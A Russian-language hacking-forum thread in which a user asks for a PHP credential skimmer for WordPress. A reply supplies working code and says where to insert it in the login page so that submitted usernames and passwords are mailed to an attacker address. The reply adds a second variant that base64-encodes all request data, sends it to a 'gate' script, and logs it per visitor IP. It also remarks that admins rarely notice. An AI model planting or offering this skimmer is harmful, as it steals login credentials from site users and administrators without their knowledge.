Взлом
Уважаемые гости! При посещении нашего сайта просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.п., а также при обращении за помощью просим быть внимательными: на сайте есть как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант-сервиса. Спасибо, что посетили XakerPlus!

Php сниффер для WP?

P

PURGE

Гость
Подскажите есть ли у кого пример PHP сниффера (скиммера) инфы и отправкой на гейт или записью в какой либо файл??

Поиск по гуглу и другим поисковикам помог найти только для магенто и то не полные или не рабочие

 
взято с экспы вроде,уже не помню давно было

=====================================================

Везде принцип один и тот же, мы вызываем $ipsclass_all, и все пароли, с емайлами или логинами приходят на наш емайл:
//wordprees

search code:
<?php } else { ?>
d = document.getElementById('user_login');
<?php
add:
$ipsclass_all = $_POST['log'] . ":" . $_POST['pwd'];
mail('test@yandex.ru', 'sitename.ru', $ipsclass_all);

Заключение:
Да и забыл сказать еще, в логах мал даемонд, спалится обычно вся отправка, но как правило 90% админов вообще не смотрят, я думаю они даже не подозревают что их снифают.
Так же удобно снифать свой же форум, в целях безопасности, вот зарегался у тебя админ, который спамит по всем форумам, а тут его парольчик и словили, 50/50 бывает и к мылу подойдет.
=====================================================

вариант с гейтом:

Отправка
if(!empty($_POST['login'])) {
 $log = base64_encode(json_encode($_REQUEST));
 file_get_contents('http://localhost/gate.php?log='.$log);
}
Прием
if(!empty($_REQUEST['log'])) {
 $path = $_SERVER['REMOTE_ADDR'].'.txt';
 $log = file_get_contents($path);
 $log .= trim($_REQUEST['log'])."\n";
 file_put_contents($path, $log);
}

=====================================================

дак так же можно взять от потера сниффер и подделать под wp.
 

 


Сверху